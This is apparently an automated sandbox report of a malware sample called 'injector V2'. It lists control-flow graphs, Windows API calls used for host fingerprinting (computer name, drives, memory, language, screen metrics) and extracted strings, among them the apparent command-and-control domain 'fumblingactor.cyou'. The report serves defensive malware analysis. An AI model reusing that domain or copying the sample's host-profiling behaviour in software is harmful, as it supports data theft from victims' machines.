                                                                                    control_flow_graph 226 425655-42565b 227 425664 226->227 228 42565d-425662 226->228 229 425667-425685 call 408610 227->229 228->229 233 425692-42569b call 408620 229->233 234 4256a0 229->234 235 4256a8-4256b1 229->235 236 42568c 229->236 233->234 234->235 237 4256b3-4256b8 235->237 238 4256ba 235->238 236->233 240 4256c1-425702 call 408610 237->240 238->240 244 425710-42572f 240->244 244->244 245 425731-425739 244->245 246 425751-42575d 245->246 247 42573b-42573e 245->247 249 425781-42578c call 440fc0 246->249 250 42575f-425763 246->250 248 425740-42574f 247->248 248->246 248->248 253 425791-425799 249->253 251 425770-42577f 250->251 251->249 251->251 254 425972-4259ef 253->254 255 425aa3-425aa8 253->255 256 425af3-425b1f 253->256 257 4257b0-4257c1 253->257 258 4257a0-4257a7 253->258 259 4259f0-425a95 253->259 260 425950-425956 call 408620 253->260 261 425965 253->261 262 42594a 253->262 263 425938-425942 253->263 254->259 264 425ad3-425aeb call 423920 255->264 265 425aaa 255->265 269 425b20-425b65 256->269 266 4257c3-4257c8 257->266 267 4257ca 257->267 258->257 259->255 279 42595f 260->279 261->254 262->260 263->262 264->256 270 425ab0-425ad1 265->270 271 4257cc-425873 call 408610 266->271 267->271 269->269 274 425b67-425bff 269->274 270->264 270->270 281 425880-4258ba 271->281 277 425c00-425c42 274->277 277->277 280 425c44-425c6b call 423790 277->280 279->261 287 425c73 280->287 281->281 283 4258bc-4258c4 281->283 285 4258e1-4258ed 283->285 286 4258c6-4258cf 283->286 289 425911-425931 GetLogicalDrives call 440fc0 285->289 290 4258ef-4258f3 285->290 288 4258d0-4258df 286->288 294 425c79-425c7f call 408620 287->294 288->285 288->288 289->256 289->260 289->262 289->263 289->279 289->287 289->294 295 425cc0 289->295 296 425ca4-425caa call 408620 289->296 297 425c88 289->297 298 425c8e-425c9a 289->298 299 425cb3-425cb8 289->299 300 425c9b-425ca1 call 408620 289->300 292 425900-42590f 290->292 292->289 292->292 294->297 295->295 296->299 297->298 299->295 300->296
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: E)C$ ])[$45$9A,_$A%L;$H=K3$J9_?$M5M3$PR$Q)R/$WT$\!R'$_O
                                                                                    • API String ID: 0-2090315249
                                                                                    • Opcode ID: da635d22eb937dc60354293ee85d6c86b0075b2866091f58ff47623310404c59
                                                                                    • Instruction ID: b68f3100725fdea93f63c05b88aeb558aac358734095ca1e3ace5d0c7ebe172d
                                                                                    • Opcode Fuzzy Hash: da635d22eb937dc60354293ee85d6c86b0075b2866091f58ff47623310404c59
                                                                                    • Instruction Fuzzy Hash: 31F1D8B4508340DFE300DF55E89166BBBE0FF86745F40892DE4958B351EBB88A09CB8B

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 307 40ce25-40ce4f 308 40ce50-40ce6e 307->308 308->308 309 40ce70-40ce87 call 408c50 call 4394c0 308->309 313 40ce8c-40ceaf 309->313 314 40ceb0-40cf22 313->314 314->314 315 40cf24-40cf9f 314->315 316 40cfa0-40cffa 315->316 316->316 317 40cffc-40d00d 316->317 318 40d02b-40d037 317->318 319 40d00f-40d016 317->319 321 40d039-40d03a 318->321 322 40d04b-40d058 318->322 320 40d020-40d029 319->320 320->318 320->320 323 40d040-40d049 321->323 324 40d05a-40d061 322->324 325 40d07b-40d083 322->325 323->322 323->323 326 40d070-40d079 324->326 327 40d085-40d086 325->327 328 40d09b-40d1ce 325->328 326->325 326->326 329 40d090-40d099 327->329 330 40d1d0-40d244 328->330 329->328 329->329 330->330 331 40d246-40d27f 330->331 332 40d280-40d29a 331->332 332->332 333 40d29c-40d2ec call 40bc20 332->333
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: )65&$.'&!$/,l=$EEBA357730734AB7E838C389DB357F59$FT]N$KO$NP]V$OR$QRNv$TR$XY$fumblingactor.cyou$~yd?
                                                                                    • API String ID: 0-3594009850
                                                                                    • Opcode ID: 5c0355d46384088a88c6e0859dcb1a9008e3f6abb8f8369841429697bd54f9cb
                                                                                    • Instruction ID: daf7d03e4006aa7799bef43f755bc3c64c81d6174eb99f28977b0d5591b26dda
                                                                                    • Opcode Fuzzy Hash: 5c0355d46384088a88c6e0859dcb1a9008e3f6abb8f8369841429697bd54f9cb
                                                                                    • Instruction Fuzzy Hash: 4BB1F1B26483D18BD335CF65C8917EBFBE0EF92304F18992DD0D99B281DB7845098B96

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 336 434a10-434af5 GetSystemMetrics * 2 342 434afc-434dce 336->342
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: MetricsSystem
                                                                                    • String ID: $4QC$@TC$XQC$^PC$iSC$PC
                                                                                    • API String ID: 4116985748-250485823
                                                                                    • Opcode ID: 3b7fd41fc91f95a93440f849e5fc468c9e9997b57805308ef3683cc16079416d
                                                                                    • Instruction ID: d870d97c3ceafa91c7ad39a0e65d79a432a51132ae261a3294225aeb1a72472e
                                                                                    • Opcode Fuzzy Hash: 3b7fd41fc91f95a93440f849e5fc468c9e9997b57805308ef3683cc16079416d
                                                                                    • Instruction Fuzzy Hash: B2917FB05093808FE360DF24D55878FBBF0BB99348F50891EE5999B250D7BA9858CF47
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @'R!$MMM@$R\Z_$YS\T$c_U
                                                                                    • API String ID: 0-3488300602
                                                                                    • Opcode ID: d1f66adfd4fcc868d937836482d338479e62927327581ddde12b0d4aa2e2a154
                                                                                    • Instruction ID: baf20e0673599ef8593dab04091c3027504b825d34360345a5d0165da7ee39e9
                                                                                    • Opcode Fuzzy Hash: d1f66adfd4fcc868d937836482d338479e62927327581ddde12b0d4aa2e2a154
                                                                                    • Instruction Fuzzy Hash: 288233B55083428BD730CF24D891BABB7E1FF96304F04497EE49987392E7398946CB96

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 616 40de2f-40de6f call 434a10 call 409b90 CoUninitialize 621 40de70-40de84 616->621 621->621 622 40de86-40dea3 621->622 623 40deb0-40ded9 622->623 623->623 624 40dedb-40df4b 623->624 625 40df50-40df77 624->625 625->625 626 40df79-40df8a 625->626 627 40dfab-40dfb3 626->627 628 40df8c-40df9a 626->628 630 40dfb5-40dfb6 627->630 631 40dfcb-40dfd8 627->631 629 40dfa0-40dfa9 628->629 629->627 629->629 632 40dfc0-40dfc9 630->632 633 40dfda-40dfe1 631->633 634 40dffb-40e003 631->634 632->631 632->632 635 40dff0-40dff9 633->635 636 40e005-40e006 634->636 637 40e01b-40e025 634->637 635->634 635->635 638 40e010-40e019 636->638 639 40e027-40e02b 637->639 640 40e03b-40e047 637->640 638->637 638->638 641 40e030-40e039 639->641 642 40e061-40e18a 640->642 643 40e049-40e04b 640->643 641->640 641->641 645 40e190-40e1b7 642->645 644 40e050-40e05d 643->644 644->644 647 40e05f 644->647 645->645 646 40e1b9-40e1da 645->646 648 40e1e0-40e215 646->648 647->642 648->648 649 40e217-40e264 call 40bc20 648->649
                                                                                    APIs
                                                                                      • Part of subcall function 00434A10: GetSystemMetrics.USER32 ref: 00434A52
                                                                                      • Part of subcall function 00434A10: GetSystemMetrics.USER32 ref: 00434A62
                                                                                    • CoUninitialize.COMBASE ref: 0040DE44
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: MetricsSystem$Uninitialize
                                                                                    • String ID: F]$V[$_]$fumblingactor.cyou
                                                                                    • API String ID: 1128523136-2066580127
                                                                                    • Opcode ID: e2e69548ec65afe510a1f042ab3d4eedb3d154c47f4f9cc49bc048d15f658242
                                                                                    • Instruction ID: 91e67c5233bfe060f6131ed90c429332b377a14934daf549c0916e1690ed0354
                                                                                    • Opcode Fuzzy Hash: e2e69548ec65afe510a1f042ab3d4eedb3d154c47f4f9cc49bc048d15f658242
                                                                                    • Instruction Fuzzy Hash: 0DA1DFB040C3D18AD3318F2594907EBBFE1AF96318F18896DD0DA5B382D7794506CB9A

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 652 408d80-408d91 call 43d090 655 408f82-408f84 ExitProcess 652->655 656 408d97-408daf SHGetSpecialFolderPathW call 436830 652->656 659 408db5-408de2 GetCurrentThreadId GetCurrentProcessId 656->659 660 408f7d call 43e3b0 656->660 661 408de4 659->661 662 408de6-408dea 659->662 660->655 661->662 664 408dec 662->664 665 408dee-408ed0 GetForegroundWindow 662->665 664->665 666 408ed6-408f4d 665->666 667 408f59-408f71 call 40a130 665->667 668 408f53-408f57 666->668 669 408f4f-408f51 666->669 667->660 672 408f73 call 40cdc0 667->672 668->667 669->668 674 408f78 call 40bbf0 672->674 674->660
                                                                                    APIs
                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408DA2
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00408DB5
                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00408DBD
                                                                                    • GetForegroundWindow.USER32 ref: 00408EC8
                                                                                    • ExitProcess.KERNEL32 ref: 00408F84
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                    • String ID:
                                                                                    • API String ID: 4063528623-0
                                                                                    • Opcode ID: 7ca63eb4d608068c3f53d204ff75812527e5826010bbffe4bc0c5a0facae7128
                                                                                    • Instruction ID: ec84d18f692cae3cd09d24be5d72724f221820b2ed8908d3715ab92a5529b125
                                                                                    • Opcode Fuzzy Hash: 7ca63eb4d608068c3f53d204ff75812527e5826010bbffe4bc0c5a0facae7128
                                                                                    • Instruction Fuzzy Hash: 48412C73B483084BD314AEBA9DC635AB6D79BC8314F09C43DA9C8DB3D5ED789C058685

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 680 42e573-42e5c7 call 440420 684 42e5d0-42e5ea 680->684 684->684 685 42e5ec-42e5f8 684->685 686 42e5fa 685->686 687 42e60b-42e617 685->687 688 42e600-42e609 686->688 689 42e62b-42e99a FreeLibrary 687->689 690 42e619-42e61f 687->690 688->687 688->688 693 42e9a5-42e9ff GetComputerNameExA 689->693 694 42e9a0 call 440420 689->694 691 42e620-42e629 690->691 691->689 691->691 695 42ea00-42ea30 693->695 694->693 695->695 696 42ea32-42ea3b 695->696 697 42ea5d 696->697 698 42ea3d-42ea46 696->698 699 42ea60-42ea6c 697->699 700 42ea50-42ea59 698->700 702 42ea8b-42eae9 GetComputerNameExA 699->702 703 42ea6e-42ea74 699->703 700->700 701 42ea5b 700->701 701->699 705 42eaf0-42eb29 702->705 704 42ea80-42ea89 703->704 704->702 704->704 705->705 706 42eb2b-42eb34 705->706 707 42eb36-42eb3f 706->707 708 42eb4d 706->708 710 42eb40-42eb49 707->710 709 42eb4f-42eb5b 708->709 712 42eb7b-42ebdf 709->712 713 42eb5d-42eb63 709->713 710->710 711 42eb4b 710->711 711->709 716 42ebe0-42ebfa 712->716 714 42eb70-42eb79 713->714 714->712 714->714 716->716 717 42ebfc-42ec05 716->717 718 42ec07-42ec0f 717->718 719 42ec1b-42ec27 717->719 720 42ec10-42ec19 718->720 721 42ec3b-42ec8f call 440420 719->721 722 42ec29-42ec2f 719->722 720->719 720->720 727 42ec90-42eca4 721->727 723 42ec30-42ec39 722->723 723->721 723->723 727->727 728 42eca6-42ecac 727->728 729 42eccb-42ece0 728->729 730 42ecae-42ecb1 728->730 732 42ee31-42ee63 729->732 733 42ece6-42eced 729->733 731 42ecc0-42ecc9 730->731 731->729 731->731 734 42ee70-42ee8c 732->734 735 42ecf0-42ecfa 733->735 734->734 736 42ee8e-42ee96 734->736 737 42ed10-42ed16 735->737 738 42ecfc-42ed03 735->738 739 42eeab-42eeae call 432c50 736->739 740 42ee98-42ee9b 736->740 741 42ed40-42ed4e 737->741 742 42ed18-42ed1b 737->742 743 42edd0-42edd6 738->743 752 42eeb3-42eed3 739->752 744 42eea0-42eea9 740->744 747 42ed54-42ed57 741->747 748 42eded-42edf6 741->748 742->741 746 42ed1d-42ed35 742->746 749 42edd8-42ede1 743->749 744->739 744->744 746->743 747->748 753 42ed5d-42edc6 747->753 750 42edf8-42edfa 748->750 751 42edfc-42edff 748->751 749->732 754 42ede3-42ede5 749->754 750->749 755 42ee01-42ee29 751->755 756 42ee2b-42ee2f 751->756 753->743 754->735 757 42edeb 754->757 755->743 756->732 756->743 757->732
                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(?), ref: 0042E637
                                                                                    • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042E9CD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ComputerFreeLibraryName
                                                                                    • String ID: SMKB
                                                                                    • API String ID: 2904949787-199350193
                                                                                    • Opcode ID: 84bb1bcb61cb764a414bf4c35f3f93cd9ffefe12dd210bfc4f3239cb5b2dad05
                                                                                    • Instruction ID: af0b3b1f951b80ed898f8c04cb280043775681b1c66c593ae400426ccc71405f
                                                                                    • Opcode Fuzzy Hash: 84bb1bcb61cb764a414bf4c35f3f93cd9ffefe12dd210bfc4f3239cb5b2dad05
                                                                                    • Instruction Fuzzy Hash: 26F1A330204B918BE7368F39D4A17A3BBE1AF27304F58499DC0E78B382D779A549C765

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 777 42e986-42e9ff call 440420 GetComputerNameExA 780 42ea00-42ea30 777->780 780->780 781 42ea32-42ea3b 780->781 782 42ea5d 781->782 783 42ea3d-42ea46 781->783 784 42ea60-42ea6c 782->784 785 42ea50-42ea59 783->785 787 42ea8b-42eae9 GetComputerNameExA 784->787 788 42ea6e-42ea74 784->788 785->785 786 42ea5b 785->786 786->784 790 42eaf0-42eb29 787->790 789 42ea80-42ea89 788->789 789->787 789->789 790->790 791 42eb2b-42eb34 790->791 792 42eb36-42eb3f 791->792 793 42eb4d 791->793 795 42eb40-42eb49 792->795 794 42eb4f-42eb5b 793->794 797 42eb7b-42ebdf 794->797 798 42eb5d-42eb63 794->798 795->795 796 42eb4b 795->796 796->794 801 42ebe0-42ebfa 797->801 799 42eb70-42eb79 798->799 799->797 799->799 801->801 802 42ebfc-42ec05 801->802 803 42ec07-42ec0f 802->803 804 42ec1b-42ec27 802->804 805 42ec10-42ec19 803->805 806 42ec3b-42ec8f call 440420 804->806 807 42ec29-42ec2f 804->807 805->804 805->805 812 42ec90-42eca4 806->812 808 42ec30-42ec39 807->808 808->806 808->808 812->812 813 42eca6-42ecac 812->813 814 42eccb-42ece0 813->814 815 42ecae-42ecb1 813->815 817 42ee31-42ee63 814->817 818 42ece6-42eced 814->818 816 42ecc0-42ecc9 815->816 816->814 816->816 819 42ee70-42ee8c 817->819 820 42ecf0-42ecfa 818->820 819->819 821 42ee8e-42ee96 819->821 822 42ed10-42ed16 820->822 823 42ecfc-42ed03 820->823 824 42eeab-42eeae call 432c50 821->824 825 42ee98-42ee9b 821->825 826 42ed40-42ed4e 822->826 827 42ed18-42ed1b 822->827 828 42edd0-42edd6 823->828 837 42eeb3-42eed3 824->837 829 42eea0-42eea9 825->829 832 42ed54-42ed57 826->832 833 42eded-42edf6 826->833 827->826 831 42ed1d-42ed35 827->831 834 42edd8-42ede1 828->834 829->824 829->829 831->828 832->833 838 42ed5d-42edc6 832->838 835 42edf8-42edfa 833->835 836 42edfc-42edff 833->836 834->817 839 42ede3-42ede5 834->839 835->834 840 42ee01-42ee29 836->840 841 42ee2b-42ee2f 836->841 838->828 839->820 842 42edeb 839->842 840->828 841->817 841->828 842->817
                                                                                    APIs
                                                                                    • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042E9CD
                                                                                    • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 0042EAB1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ComputerName
                                                                                    • String ID: SMKB
                                                                                    • API String ID: 3545744682-199350193
                                                                                    • Opcode ID: c1fbc1c1cd76db13ff124be77aedb5b87d99e15673911b32ece58eeb9cc97f14
                                                                                    • Instruction ID: 5b8b3e73ca0bc2d54b50f5b4fcd8676657c0da4bb17634c61f1f99bb84d849c1
                                                                                    • Opcode Fuzzy Hash: c1fbc1c1cd76db13ff124be77aedb5b87d99e15673911b32ece58eeb9cc97f14
                                                                                    • Instruction Fuzzy Hash: 83C1A230108B908AE736CF3694657F3BBE1AF27304F44499DC0EB9B282D779A549CB65
                                                                                    APIs
                                                                                    • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042F045
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: InstalledMemoryPhysicallySystem
                                                                                    • String ID:
                                                                                    • API String ID: 3960555810-0
                                                                                    • Opcode ID: d69687e6c22ed53eebb580c7f8af350e38e40b1aa3c48f14f61b4a0bc34983c0
                                                                                    • Instruction ID: 056d5d551f466a474ca61b598eb84f26100ca8a69ac67d6299fece4edac190fe
                                                                                    • Opcode Fuzzy Hash: d69687e6c22ed53eebb580c7f8af350e38e40b1aa3c48f14f61b4a0bc34983c0
                                                                                    • Instruction Fuzzy Hash: DFD15871604B408BD739CF39D490763BBE2AF96304F588A6EC0D78B786DB39A50AC754
                                                                                    APIs
                                                                                    • LdrInitializeThunk.NTDLL(00441142,005C003F,00000008,00000018,?), ref: 0043E4AE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                    • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                    • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                    • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: 7654
                                                                                    • API String ID: 2994545307-4024152101
                                                                                    • Opcode ID: 0ef41de9bb6edcb7bcd011eda3842dede41f6ac0de0f38ef965d24c2739b9bad
                                                                                    • Instruction ID: c52c56b965f2fcbf7ea79454a85090f42ae9ccd1348fffa0717f8c3364df2f0c
                                                                                    • Opcode Fuzzy Hash: 0ef41de9bb6edcb7bcd011eda3842dede41f6ac0de0f38ef965d24c2739b9bad
                                                                                    • Instruction Fuzzy Hash: 535189B6F0526057EB24AB12AC5276F3652AFC4318F55403EE80A37283DE796D06C6DF

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 758 43802a-438053 call 440420 762 438057-438075 GetUserDefaultUILanguage 758->762 763 438055 758->763 764 43807a-438085 762->764 763->762 764->764 765 438087 764->765 766 438089-43808c 765->766 767 43808e-4380ba 766->767 768 4380bc-4380eb 766->768 767->766
                                                                                    APIs
                                                                                    • GetUserDefaultUILanguage.KERNELBASE ref: 00438057
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: DefaultLanguageUser
                                                                                    • String ID: "$#$%
                                                                                    • API String ID: 95929093-3532947016
                                                                                    • Opcode ID: 4c893312475e4190a8d3ba915345f69893da5641c593096fdfc6d439405b31b9
                                                                                    • Instruction ID: 6269889a9b65b3dd2f9485572c88820ee243b25ba7ed443d02dbd458bae4ad1d
                                                                                    • Opcode Fuzzy Hash: 4c893312475e4190a8d3ba915345f69893da5641c593096fdfc6d439405b31b9
                                                                                    • Instruction Fuzzy Hash: 78215936D043A58FDF148F74D8443FEBBB15B99310F2A80ADC99067381C97E9A898BD5
                                                                                    APIs
                                                                                    • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 0043E450
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 2411ea3a7a6fcdc6fb4e7061e3bb0e183c246fdc6988f9c310cc9b4b83ef534f
                                                                                    • Instruction ID: 19542a50b7386a1c3dac37311dc98b9c7a76f3cf7a53d68946b425c3295cedba
                                                                                    • Opcode Fuzzy Hash: 2411ea3a7a6fcdc6fb4e7061e3bb0e183c246fdc6988f9c310cc9b4b83ef534f
                                                                                    • Instruction Fuzzy Hash: BB114C72A042128BD314DF39DC55A1BB76BEFCE301F098879D88057149DA349816C6D2
                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(?,00000000,?), ref: 0043BCE7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 3298025750-0
                                                                                    • Opcode ID: 5a92c9e023f11f389f4aaaeba5d1c2f0e62b2d9d88c9cfb5f346e52b1beceeb5
                                                                                    • Instruction ID: b434d758bf00353734159668cec28ce173c4b33463bb7985cf1770455835634d
                                                                                    • Opcode Fuzzy Hash: 5a92c9e023f11f389f4aaaeba5d1c2f0e62b2d9d88c9cfb5f346e52b1beceeb5
                                                                                    • Instruction Fuzzy Hash: 1811AB33B993544BC3288EA4ACD165BFB4AD7C9324F1A413DD8845B2E1C9640C24C391
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(?,00000000,00004021,?,?,?,004239A1), ref: 0043BC2B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: c0256ce51743fc08c8df6e21bcdfc83e2a5a802704955a0f06629abc2b76cd6a
                                                                                    • Instruction ID: 93249e33f8eab1ab5a5b803966a39683f08daa8ce4e81569f3846dc08810f3a0
                                                                                    • Opcode Fuzzy Hash: c0256ce51743fc08c8df6e21bcdfc83e2a5a802704955a0f06629abc2b76cd6a
                                                                                    • Instruction Fuzzy Hash: F6F0C0319081608FD301C729EC2461F7AA3EBC4A24F09807CD48447354C9315801CFC2
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: BlanketProxy
                                                                                    • String ID:
                                                                                    • API String ID: 3890896728-0
                                                                                    • Opcode ID: ac9982cd0f2bda9c440031b818958bc790b664b8fe6775204b8eb48106fdd4d9
                                                                                    • Instruction ID: d1e759b4ae0efbd400adcfaa92f9f226fc8968873930e28b105e02b75b2d22e4
                                                                                    • Opcode Fuzzy Hash: ac9982cd0f2bda9c440031b818958bc790b664b8fe6775204b8eb48106fdd4d9
                                                                                    • Instruction Fuzzy Hash: 5BF0B2B45097428FD315DF24C5A9717BFF1FB89304F01885DE4A58B391D7B99908CB92
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: BlanketProxy
                                                                                    • String ID:
                                                                                    • API String ID: 3890896728-0
                                                                                    • Opcode ID: f7785a69041ee58e0809caf9ae336b8cdeced4e8a51149c2d12a4696e3830c09
                                                                                    • Instruction ID: af87fca264f035a3ce3685b586e73b4fd16443edb0e392b33753fb592137f721
                                                                                    • Opcode Fuzzy Hash: f7785a69041ee58e0809caf9ae336b8cdeced4e8a51149c2d12a4696e3830c09
                                                                                    • Instruction Fuzzy Hash: 10F0D4B41087018FE344DF24C5A875BBBE2BB89308F11891CE0954B394C7B6A909CF82
                                                                                    APIs
                                                                                    • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CDD3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: Initialize
                                                                                    • String ID:
                                                                                    • API String ID: 2538663250-0
                                                                                    • Opcode ID: 54f9b1cfb0f17e120d2a0d18b9ec134cecc09ecec9e3dcbcf69b035d607272ec
                                                                                    • Instruction ID: 0bd83624564a8c5f579967c148d55abd7f42f54bfba681c3cc5c1a94088b0f27
                                                                                    • Opcode Fuzzy Hash: 54f9b1cfb0f17e120d2a0d18b9ec134cecc09ecec9e3dcbcf69b035d607272ec
                                                                                    • Instruction Fuzzy Hash: E7D0A7349986846BD240775CEC47F22366C9783725F400237B2A6C73D1EA506915C5A9
                                                                                    APIs
                                                                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CE05
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeSecurity
                                                                                    • String ID:
                                                                                    • API String ID: 640775948-0
